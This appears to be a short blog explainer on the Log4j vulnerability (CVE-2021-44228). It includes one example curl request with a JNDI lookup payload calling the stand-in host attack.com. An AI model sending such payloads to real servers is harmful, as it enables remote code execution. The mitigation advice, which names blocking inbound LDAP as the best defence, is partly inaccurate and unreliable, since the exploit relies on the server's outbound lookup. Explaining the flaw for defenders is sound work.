Log4j vulnerability is a new zero day critical vulnerability discovered in open source Apache logging frameworkcalled “Log4j” which is used to log the activity within an Java application. This is a serious vulnerability that is triggered by an user sending a malicious payload as an request to the server running a Java application which is using Log4j package to record the activity. This can be triggered by sending a normal request along with payload like this
curl xxxxx -H 'X-Api-Version: ${jndi:ldap://attack.com/attack}'
The above curl sends out a request to XXXX server with the payload which calls a website or any ipaddress via Java Naming Directory interface. Instead of filtering out the payload, the JNDI directly calls the website “attack.com” via ldap protocol. This can be used to exploit any server running as any attacker can directly run commands on the server by downloading a script using this exploit command.
More about it can be seen here – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
Solution: Though the log4j has come out with a newer version 2.15.0 in which the exploit is turned off. The best way to defend is to put in firewall rules that prevents anyone from sending inbound request via LDAP protocols to the critical servers.
And you can test for this vulnerability by following the steps here – https://www.ramanean.com/how-to-test-for-log4j-vulnerability-in-your-java-app/